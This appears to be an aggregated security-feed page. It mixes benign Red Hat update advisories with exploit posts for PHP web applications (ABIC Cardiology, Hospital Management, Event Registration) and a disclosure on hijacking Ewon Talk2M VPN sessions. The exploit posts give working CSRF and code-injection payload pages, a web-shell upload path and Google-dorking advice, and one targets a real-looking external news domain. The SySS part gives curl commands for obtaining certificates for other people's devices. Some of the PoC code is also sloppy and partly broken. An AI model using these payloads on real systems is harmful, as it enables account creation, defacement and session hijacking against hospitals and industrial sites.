ABIC Cardiology Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ABIC cardiology Management System 1.0 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://abicegypt.com/                                                                                                      |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 7 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="panel panel-default panel-table">  
                <div class="panel-heading"> <h2 class="text-center">New User </h2>  
                </div>  
                <div class="panel-body">  
                  <div class="col-md-offset-2 col-md-8">

<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">

            <div class="form-group"> User Name  
                <input type="text" name="username" class="form-control" placeholder="Insert User Name">  
            </div>  
            <div class="form-group"> Password  
                <input type="text" name="password" class="form-control" placeholder="Insert Password">  
            </div>

      <div class="col-xs-12">  
                <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>  
            </div>  
  <input type="hidden" name="MM_insert" value="form1">  
</form>

              </div>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-5584-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5584.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5584-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5584Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5584-03

Hospital Management System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================  
| # Title     : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip                                  |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

---------------------- [+] Part 02 : contact.php [+] --------------------

[+] Line 4  :  Make sure to include your database connection here

[+] Line 60 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php

// عنوان الخادم الخارجي  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';

// جلب البيانات من الخادم الخارجي  
$response = file_get_contents($url);

// التحقق من وجود البيانات  
if ($response !== FALSE) {  
    // التعامل مع البيانات  
    echo $response;  
} else {  
    echo 'حدث خطأ أثناء جلب البيانات.';  
}

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $email = $con->real_escape_string($_POST['email']);  
    $mobnum = $con->real_escape_string($_POST['mobnum']);

        $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");

    if ($query) {  
        echo '<script>alert("Contact Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}

?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Admin | Update Contact Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        function submitForm(event) {  
            event.preventDefault();

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent();  
            const email = document.getElementById('email').value;  
            const mobnum = document.getElementById('mobnum').value;

            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('email', email);  
            formData.append('mobnum', mobnum);  
            formData.append('submit', true);

            fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('Contact Us content has been updated successfully.');  
                console.log(data);  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto;  
            padding: 20px;  
            text-align: center;  
        }

        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
                            </div>  
                            <ol class="breadcrumb">  
                                <li class="active">  
                                    <span>Update Contact Us Content</span>  
                                </li>  
                            </ol>  
                        </div>  
                    </section>  
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="email">Email</label>  
                                            <input id="email" name="email" type="email" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="mobnum">Mobile Number</label>  
                                            <input id="mobnum" name="mobnum" type="text" class="form-control" required>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
            </div>  
        </div>  
    </div>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hospital Management System 1.0 Code Injection

Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.

=============================================================================================================================================| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : admin_class.php    $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";    if(!empty($_FILES['cover']['tmp_name'])){      $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));      $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);      $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';      $hostName = $_SERVER['HTTP_HOST'];      $path =explode('/',$_SERVER['PHP_SELF']);      $currentPath = '/'.$path[1];       if($move){            $data .= ", cover_img='$fname' ";      }    }  [+] Line 27 : Set your target url.[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Manage About Page</title>        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script></head><body>    <div class="container mt-5">        <div class="col-lg-12">            <div class="card card-outline card-primary">                <div class="card-body">                    <form action="" id="manage-about">                        <div class="form-group">                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>                            </textarea>                        </div>                    </form>                </div>                <div class="card-footer border-top border-info">                    <div class="d-flex w-100 justify-content-center align-items-center">                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>                    </div>                </div>            </div>        </div>    </div>    <script>        $(document).ready(function(){            // Initialize Summernote Editor            $('.summernote2').summernote({                height: 300,                toolbar: [                    ['style', ['style']],                    ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],                    ['fontname', ['fontname']],                    ['fontsize', ['fontsize']],                    ['color', ['color']],                    ['para', ['ol', 'ul', 'paragraph', 'height']],                    ['table', ['table']],                    ['insert', ['link', 'picture']],                    ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]                ],                callbacks: {                    onImageUpload: function(files) {                        saveImg(files[0]);  // Handle image upload                    }                }            });            // Function to save uploaded image            function saveImg(_file) {                var data = new FormData();                data.append("file", _file);                $.ajax({                    data: data,                    type: "POST",                    url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",                    cache: false,                    contentType: false,                    processData: false,                    success: function(resp) {                        var image = $('<img>').attr('src', resp);                        $('.summernote2').summernote("insertNode", image[0]);                    }                });            }        });        // Form Submission        $('#manage-about').submit(function(e) {            e.preventDefault();            start_load();  // Start a loading indicator (you need to define this function)            $.ajax({                url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                success: function(resp) {                    if(resp == 1) {                        alert_toast('Data successfully saved', "success");                        end_load();  // End the loading indicator (you need to define this function)                    }                }            });        });        // Optional: Define start_load and end_load functions        function start_load() {            // Add your loading indicator logic here        }        function end_load() {            // Remove your loading indicator logic here        }        function alert_toast(message, type) {            alert(message); // Basic alert. Replace with a better toast notification if needed.        }    </script></body></html>[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Event Registration and Attendance System 1.0 Code Injection

Red Hat Security Advisory 2024-5583-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5583.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5583-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5583Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5583-03

Red Hat Security Advisory 2024-5582-03 - An update for kpatch-patch-4_18_0-372_87_1 and kpatch-patch-4_18_0-372_91_1 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5582.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch-4_18_0-372_87_1 and kpatch-patch-4_18_0-372_91_1 security update  
Advisory ID:        RHSA-2024:5582-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5582  
Issue date:         2024-08-20  
Revision:           03  
CVE Names:          CVE-2024-36971  
====================================================================

Summary: 

An update for kpatch-patch-4_18_0-372_87_1 and kpatch-patch-4_18_0-372_91_1 is now available for Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-372.87.1.el8_6.

Security Fix(es):

* kernel: net: CVE-2024-36971 kernel: UAF in network route management (CVE-2024-36971)

* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)

* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-36971

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2299240  
https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-5582-03

Red Hat Security Advisory 2024-5522-03 - An update for kpatch-patch-4_18_0-553 is now available for Red Hat Enterprise Linux 8. Issues addressed include code execution and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5522.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-4_18_0-553 security updateAdvisory ID:        RHSA-2024:5522-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5522Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-36886====================================================================Summary: An update for kpatch-patch-4_18_0-553 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-553.el8_10.Security Fix(es):* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)* kernel: net: UAF in network route management (CVE-2024-36971)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-36886References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2277238https://bugzilla.redhat.com/show_bug.cgi?id=2292331

Red Hat Security Advisory 2024-5522-03

Red Hat Security Advisory 2024-5082-03 - Updated packages that resolve various issues are now available for Red Hat OpenStack Platform 17.1 for Red Hat Enterprise Linux 8.4.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5082.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenStack Platform 17.1.3 security updateAdvisory ID:        RHSA-2024:5082-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5082Issue date:         2024-08-19Revision:           03CVE Names:          ====================================================================Summary: Updated packages that resolve various issues are now available for Red Hat OpenStack Platform 17.1 (Wallaby) for Red Hat Enterprise Linux (RHEL) 8.4.Red Hat Product Security has rated this update as having a security impactof Important.Description:Red Hat OpenStack Platform provides the facilities for building, deploying and monitoring a private or public infrastructure-as-a-service (IaaS) cloud running on commonly available physical hardware.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297217

Red Hat Security Advisory 2024-5082-03

During account assignment in the Talk2M platform, a Cosy+ device generates and sends a certificate signing request (CSR) to the back end. This CSR is then signed by the manufacturer and used for OpenVPN authentication by the device afterward. Since the common name (CN) of the certificate is specified by the device and used in order to assign the OpenVPN session to the corresponding Talk2M account, an attacker with root access to a Cosy+ device is able to manipulate the CSR and get correctly signed certificates for foreign devices.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-043  
Product:                   Ewon Cosy+ / Talk2M Remote Access Solution  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       N.A.  
Tested Version(s):         N.A.  
Vulnerability Type:        Improper Authentication (CWE-287)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-17  
Solution Date:             2024-04-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33897  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

During account assignment in the Talk2M platform, a Cosy+ device  
generates and sends a certificate signing request (CSR) to the back end.  
This CSR is then signed by the manufacturer and used for OpenVPN  
authentication by the device afterward.

Since the common name (CN) of the certificate is specified by the device  
and used in order to assign the OpenVPN session to the corresponding  
Talk2M account, an attacker with root access to a Cosy+ device is able  
to manipulate the CSR and get correctly signed certificates for foreign  
devices.

Using these certificates for OpenVPN authentication results in hijacking  
the VPN session and allows for further attacks, e.g.:

- - Impacting the accessibility of the original device  
- - Attacking the Talk2M-connected user device via the VPN connection  
- - Eavesdropping and manipulating the network communication of connected  
   users

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Note: Since the X.509 client certificate of a Cosy+, which is used for  
       authentication against the Talk2M API, is handled by the hardware  
       security module (HSM), root access to a Cosy+ device is required.

1. Exporting the OpenSSL engine to use the hardware security module:

        $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf  
    $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0

2. Sending a self-created CSR to the Talk2M API:

      $ curl --path-as-is -i -s -k -X $'POST' \  
     -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \  
     -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \  
     -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \  
     --data-binary $'{\x0a\x09\"csr\":  
         \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY  
         xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U  
         EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt  
         zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI  
         1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE  
         GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\  
         nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX  
         aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO  
         4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu  
         6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi  
         PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW  
         vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT  
         E REQUEST-----\\n\"\x0a}' \  
     $'https://eu.device.talk2m.com/certificates/csr' \  
     --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem

3. Requesting the signed certificate:

          $ curl -i -k -H $'Device-State: AccountLinked' \  
     https://device.talk2m.com/certificates/deviceCertificate  \  
     --cert birth_key_crt.pem --key birth_key_ref.pem

4. Talk2M response:

          HTTP/1.1 200  
     date: Tue, 16 Apr 2024 13:09:57 GMT  
     server: Apache  
     ewon-server-time: 1713272998  
     device-state: VpnProvisioned  
     content-type: application/json  
     transfer-encoding: chunked

          {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]  
     KsxyR8w==\n-----END CERTIFICATE-----"}

5. This signed certificate and the used key can be used for OpenVPN  
    authentication. The CN will be used to assign the session to the  
    corresponding Talk2M account. This also overwrites a potential  
    current VPN session of the original device:

     $ openvpn --config attacker.ovpn  
       Attempting to establish TCP connection with [AF_INET]51.195.79.69:443  
       TCP connection established with [AF_INET]51.195.79.69:443  
       TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443  
       VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,  
         OU=Talk2M, CN=Talk2M Certification Authority,  
         emailAddress=itmanager@talk2m.com  
       VERIFY KU OK  
       Validating certificate extended key usage  
       ++ Certificate has EKU (str) TLS Web Server Authentication,  
         expects TLS Web Server Authentication  
       VERIFY EKU OK  
       VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,  
         O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,  
         emailAddress=info@ewon.biz  
       Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,  
         peer certificate: 2048 bit RSA, signature: RSA-SHA1  
       [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443  
       TUN/TAP device tap0 opened  
       net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0  
       TUN/TAP link layer address set to 00:03:27:d8:68:84  
       net_iface_mtu_set: mtu 1500 for tap0  
       net_iface_up: set tap0 up  
       net_addr_v4_add: 10.37.211.214/16 dev tap0  
       Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'  
       Timers: ping 10, ping-exit 40  
       Initialization Sequence Completed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability was fixed in the back end by HMS on April 18, 2024.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-09: Potential vulnerability discovered  
2024-04-16: Call with the manufacturer and requested a Talk2M account  
             with an assigned device to verify the potential vulnerability  
2024-04-16: Manufacturer provided a Talk2M account with an assigned device  
2024-04-16: Vulnerability confirmed  
2024-04-16: Short update about the state sent to the manufacturer  
